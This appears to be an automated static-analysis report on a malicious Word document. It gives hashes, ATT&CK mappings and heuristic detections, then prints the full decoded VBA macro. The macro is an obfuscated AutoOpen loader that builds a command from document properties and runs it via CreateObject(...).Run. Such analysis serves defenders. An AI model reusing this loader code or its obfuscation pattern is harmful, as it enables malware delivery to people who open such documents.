Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ddfc1e80e8eb4c0e…

MALICIOUS

Office (OLE)

70.0 KB Created: 2017-08-23 21:42:00 Authoring application: Microsoft Office Word First seen: 2017-09-14
MD5: fb9c7a466c950f3c483a9e2d4eb05c55 SHA-1: 1703d2c9619a4abdf81327c5fbf7c61aae404d33 SHA-256: ddfc1e80e8eb4c0ece096788b0ca80f9e2a2fa55011dd42e2deca7cf9e498c3e
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample is a Microsoft Office document containing heavily obfuscated VBA macros, identified by heuristics as an auto-exec loader. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' strongly suggests a downloader functionality. The VBA code, while obfuscated, uses CreateObject and execution tokens, indicating an intent to run external code, likely a second-stage payload. No specific family could be identified due to the obfuscation and generic nature of the downloader.

Heuristics 9

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub autoopen()
vbBHYNaEZg
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9652 bytes
SHA-256: 3f249594475add639a9b3d741a6b18d4e89aefc510ce3188aca83d2ae9dee844
Detection
ClamAV: No threats found
Obfuscation or payload: likely
130 of 176 identifiers look randomly generated (e.g. 'zxEmtZhsZgk') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function MLFuHyshxSt()
rmdLFuLRp = 5092
Dim sGGmRKTH(5092)
ceHBVrYbk = "vgpPzmNrhb"
 sGGmRKTH(4926) = yanrFKPwWME
 sGGmRKTH(2280) = eyEurZXUv
 sGGmRKTH(2358) = zxEmtZhsZgk
 sGGmRKTH(4996) = vsYarpyZX
 sGGmRKTH(4921) = 4423 + 6222 / 4450 - 8114 - 5331 - 6918 + 4187 + 4056 + 9951
 sGGmRKTH(1427) = 1463 + 8330 + 6453 / 900 / 3661 - 4345 - 1549 + 5642 + 5235 + 9873
 sGGmRKTH(4760) = hzsCWEhUwN
 sGGmRKTH(4246) = sdcGMgwzbS
 sGGmRKTH(3549) = cFcNbsG
 sGGmRKTH(4836) = WyrNVYKc
 sGGmRKTH(1033) = 9023
 sGGmRKTH(2042) = VeavsdhDrbb
 sGGmRKTH(1491) = 1268 + 3370 / 7251 / 3179 - 8977 - 4991 + 9615
 sGGmRKTH(2853) = 216 + 8217 + 6881 / 5034 / 6787 - 7859 - 750 + 8628
  For rmdLFuLRp = 799 To 850
sGGmRKTH(rmdLFuLRp) = rmdLFuLRp
Next
UDtHzPT = sGGmRKTH(4223) + sGGmRKTH(2546) + sGGmRKTH(2883) + sGGmRKTH(3607) + sGGmRKTH(5092)
 VWWVkcCd = sGGmRKTH(941) + sGGmRKTH(750) + sGGmRKTH(230) + sGGmRKTH(419) + sGGmRKTH(1426) + sGGmRKTH(1201) + sGGmRKTH(2686) + sGGmRKTH(5092)
End Function
Function WPUGMnEkPV()
PhwDPTFFG = 9594
Dim dFxarWCCCaf(9594)
HezUwNPf = "dexbUsm"
 NyrNLMNS = "LFNrxdsHLNF"
 PELNRKhbyV = "XTvnecDA"
 dFxarWCCCaf(3644) = kgekNGZgBp
 dFxarWCCCaf(4525) = eKACDTFpHt
 dFxarWCCCaf(7470) = 9591 + 600 + 6426 / 7839 / 231 / 4510 - 7390 - 7414 + 8633
 dFxarWCCCaf(370) = 3734 + 8628 + 4054 / 5130 / 4073 / 1313 - 5337 + 2483 + 1658 + 2664
 dFxarWCCCaf(1038) = UhCmFDXTwE
 dFxarWCCCaf(9097) = nENnTnDGY
 dFxarWCCCaf(5873) = hLsbDLbcF
 dFxarWCCCaf(7200) = 2924
 dFxarWCCCaf(258) = wEYmMgMMX
 dFxarWCCCaf(259) = nsKmbphDTv
 dFxarWCCCaf(702) = AUKLfmN
 dFxarWCCCaf(269) = 7215 + 8057 + 3161 + 4977 / 1016 / 3088 / 1713 - 9534 - 6893 + 4311 + 8308
 dFxarWCCCaf(1328) = 3386 + 9258 + 8333 / 4848 / 98 - 5807 - 6466 - 2118 + 9218 + 8221
 dFxarWCCCaf(2714) = 315 + 9715 + 679 + 4339 / 8350 / 4043 - 139 - 672 - 9490 + 8395
  For PhwDPTFFG = 6296 To 4232
dFxarWCCCaf(PhwDPTFFG) = PhwDPTFFG
Next
VgvmuAUGBHu = dFxarWCCCaf(2470) + dFxarWCCCaf(8250) + dFxarWCCCaf(2481) + dFxarWCCCaf(4735) + dFxarWCCCaf(5712) + dFxarWCCCaf(1160) + dFxarWCCCaf(5445) + dFxarWCCCaf(9594)
End Function
Function nbenegXL()
kpsCWLtnGf = 3708
Dim fvBKDUyV(3708)
pwzKaas = "NsbwXxzKNa"
 fvBKDUyV(1439) = yEfpPps
 fvBKDUyV(382) = rDRHrKsL
 fvBKDUyV(3541) = fyysYfAf
 fvBKDUyV(2789) = LEnULNwm
 fvBKDUyV(797) = 1009 + 4664 + 4868 / 1385 / 5866 / 3579 - 6327 - 3471 - 3696 + 7896 + 740
 fvBKDUyV(2817) = AfkvTPN
 fvBKDUyV(1181) = BCnePTd
 fvBKDUyV(3020) = 2068
 fvBKDUyV(1234) = 2588
 fvBKDUyV(1095) = 8197
 fvBKDUyV(780) = 6028
 fvBKDUyV(824) = eSMapuRRadf
 fvBKDUyV(311) = urTmehgk
 fvBKDUyV(1206) = TBLuScZxVa
 fvBKDUyV(743) = MmxUZDkBF
 fvBKDUyV(991) = 7937 + 4085 / 9128 / 4799 - 4667 - 187 - 2384 + 6165
 fvBKDUyV(3673) = 8063 + 5428 + 7387 / 1109 / 5216 - 981 + 4235 + 4093
 fvBKDUyV(862) = 8394 + 514 + 1940 / 9342 - 8516 - 683 + 9493 + 1405 + 5911
  For kpsCWLtnGf = 1937 To 1897
fvBKDUyV(kpsCWLtnGf) = kpsCWLtnGf
Next
FScCMcSbNu = fvBKDUyV(901) + fvBKDUyV(3101) + fvBKDUyV(3708)
End Function
Sub autoopen()
vbBHYNaEZg
End Sub
Public Function ksSeMgkLWVB(WMHvxAzsmU)
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 zevsSCL = ActiveDocument.CustomDocumentProperties(WMHvxAzsmU)
ksSeMgkLWVB = zevsSCL
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 End Function
Public Function vbBHYNaEZg()
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 czhtGrd = ksSeMgkLWVB("RHmXeVcUY") + ksSeMgkLWVB("BewWdSvL") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + ksSeMgkLWVB("XRMmkXuSH") + ksSeMgkLWVB("gZFZuXdyc") + ksSeMgkLWVB("hNFftPrH")
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 yFWygTbc = ksSeMgkLWVB("DHeALmy") + ksSeMgkLWVB("UaDApyp") + ksSeMgkLWVB("LBphwbd") + ksSeMgkLWVB("sTARBmmuWkG") + ksSeMgkLWVB("ZPAewUsVr") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + ksSeMgkLWVB("SvGheyFpKtG")
rrpGwAG = yFWygTbc + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + LfbPEascM
CreateObject(czhtGrd).Run$ rrpGwAG + DfSgUYAGwWY + PxhprVMe + xrnhzSkcnS + cExYpfymCxD + AzATNzERLF + ApSeRmhnsn + UzrNgsRwCsE + BVPUPKA + rsHFrUcUY + xNCSKAFva + DKeNsUxV + wrURVdNcXT + nFLCTktdB, 0
rEfPxwubFy = uwTskyFm + fxcZzXuhbbk = UezwMfE
 aNnGEAauSBm = TVphzBWe + kDwEGPdEKXU = UKgggTA
 DeUgVZEznG = Dzfnauc + muFssAdXe = dXfGRAmak
 gsRuEBeUbAc = cFcyNTPcWw + uvkGELbFz = wEaHtXzL
 YfMeDpsMg = yayYyStdCG + vKfwYyA = AkpdTAnrXCn
 EYUndktBbC = WxXPKCw + SRmFFzS = cCuHZdp
 End Function

Function tXbKMGSsy()
HpcFtCFdEyk = 8562
Dim DdrZgdTBDs(8562)
FNNGwvmFeWA = ("rZVRZRwH")
 ZZecEuZ = ("KVykbUYvK")
 DdrZgdTBDs(2917) = VefFYzADwCR
 DdrZgdTBDs(7196) = deKSNTZuaZ
 DdrZgdTBDs(8010) = SKNAKZMB
 DdrZgdTBDs(4765) = WysWaAt
 DdrZgdTBDs(2811) = 1354 + 7986 + 3935 / 636 - 8569 - 2290 + 5162
 DdrZgdTBDs(5277) = 1091 + 8378 + 2694 / 7564 - 4788 - 4821 + 2448 + 7690 + 2898
 DdrZgdTBDs(6805) = 2194 + 3280 / 7236 / 7879 - 4966 + 87 + 5255
 DdrZgdTBDs(4987) = gDvzCfr
 DdrZgdTBDs(4670) = vaCWpVaYaM
 DdrZgdTBDs(6386) = 62
 DdrZgdTBDs(3207) = 1613
 DdrZgdTBDs(3987) = aphhBDm
 DdrZgdTBDs(2078) = 5270 + 6944 + 4072 / 9870 / 4802 / 3736 - 6243 - 87 + 416 + 567 + 3581
 DdrZgdTBDs(1724) = 457 + 4104 + 314 / 3772 / 549 / 826 - 5239 - 7241 - 9263 + 1946 + 7734 + 1512
  For HpcFtCFdEyk = 5703 To 1598
DdrZgdTBDs(HpcFtCFdEyk) = HpcFtCFdEyk
Next
nSpFspnVK = DdrZgdTBDs(7428) + DdrZgdTBDs(7363) + DdrZgdTBDs(1881) + DdrZgdTBDs(4033) + DdrZgdTBDs(5700) + DdrZgdTBDs(4053) + DdrZgdTBDs(8562)
 XSWMkmpfsds = DdrZgdTBDs(7901) + DdrZgdTBDs(3586) + DdrZgdTBDs(603) + DdrZgdTBDs(6244) + DdrZgdTBDs(3622) + DdrZgdTBDs(4403) + DdrZgdTBDs(8562)
 funKLPBbLL = DdrZgdTBDs(7396) + DdrZgdTBDs(6233) + DdrZgdTBDs(7315) + DdrZgdTBDs(8562)
End Function
Function ncvAGAxMMp()
ZBgtTbFp = 3376
Dim KUHABpfUx(3376)
zeAUarcU = ("nvzfUrMuUN")
 SGmTWxc = ("csyuwGpvG")
 KUHABpfUx(2055) = vMMxfmwkxR
 KUHABpfUx(105) = DrdzDRznttS
 KUHABpfUx(2936) = FBWKrsw
 KUHABpfUx(3101) = nUHaYmtzhH
 KUHABpfUx(1094) = 9136 + 6574 + 1345 / 4426 / 3680 / 1748 - 8371 - 7934 + 7229 + 606
 KUHABpfUx(992) = YMtSLPZGK
 KUHABpfUx(2057) = YtEsrAhEWS
 KUHABpfUx(938) = cUXuRFecB
 KUHABpfUx(703) = 8589
 KUHABpfUx(2135) = 8980
 KUHABpfUx(2736) = 2023
 KUHABpfUx(1549) = 155
 KUHABpfUx(599) = HPSnZgv
 KUHABpfUx(1255) = KKDUXTFb
 KUHABpfUx(1654) = YkHvpcsEbF
 KUHABpfUx(1498) = RcDALXkwHFH
 KUHABpfUx(2288) = 8301 + 3091 + 7425 / 264 - 2626 + 1558 + 7775 + 2055
 KUHABpfUx(2713) = 2305 + 5526 + 4756 / 1457 / 7947 - 3327 - 4974 + 4755 + 672 + 5486
 KUHABpfUx(605) = 9203 + 6555 / 5693 - 9073 + 4713
  For ZBgtTbFp = 796 To 860
KUHABpfUx(ZBgtTbFp) = ZBgtTbFp
Next
yXwkvVcE = KUHABpfUx(318) + KUHABpfUx(3376)
 GdYRPUZTyx = KUHABpfUx(1727) + KUHABpfUx(2058) + KUHABpfUx(2850) + KUHABpfUx(2303) + KUHABpfUx(1669) + KUHABpfUx(2746) + KUHABpfUx(1777) + KUHABpfUx(3376)
 xHvHDnWp = KUHABpfUx(2162) + KUHABpfUx(3333) + KUHABpfUx(246) + KUHABpfUx(1490) + KUHABpfUx(2754) + KUHABpfUx(250) + KUHABpfUx(948) + KUHABpfUx(3376)
End Function
Function zxFkhSSRP()
yKbuEVtWn = 7698
Dim gDzCKgeKr(7698)
AzmzuHzzv = ("ZMvFHypVXS")
 uPBsfHn = ("ktgFHTYf")
 gDzCKgeKr(5621) = UUFseExWHzU
 gDzCKgeKr(2887) = 1700 + 6605 / 2628 / 6750 - 6686 - 2603 + 1621 + 6544
 gDzCKgeKr(4732) = 9143 + 5313 + 7899 + 8131 / 1197 / 6242 / 8549 - 8451 + 6609
 gDzCKgeKr(5604) = 6178 + 3261 + 424 / 7830 / 8295 - 2214 - 9614 + 4657 + 8831 + 4722
 gDzCKgeKr(5971) = NCfCzvW
 gDzCKgeKr(4254) = 8463
 gDzCKgeKr(5589) = tYUgXEnZyw
 gDzCKgeKr(6720) = 8674 + 5445 / 180 / 891 - 6846 + 7432 + 4495 + 2215
 gDzCKgeKr(1356) = 9692 + 7370 / 8534 - 8956 - 7224 + 4950 + 5138 + 3800
 gDzCKgeKr(3411) = 8598 + 5961 + 8278 / 5081 / 6856 - 2935 + 667
  For yKbuEVtWn = 268 To 3876
gDzCKgeKr(yKbuEVtWn) = yKbuEVtWn
Next
ACSwDpHGYK = gDzCKgeKr(4172) + gDzCKgeKr(5618) + gDzCKgeKr(4759) + gDzCKgeKr(2875) + gDzCKgeKr(242) + gDzCKgeKr(2640) + gDzCKgeKr(5887) + gDzCKgeKr(7698)
 mcAKYmWeAZN = gDzCKgeKr(1943) + gDzCKgeKr(812) + gDzCKgeKr(3479) + gDzCKgeKr(7424) + gDzCKgeKr(1549) + gDzCKgeKr(7698)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.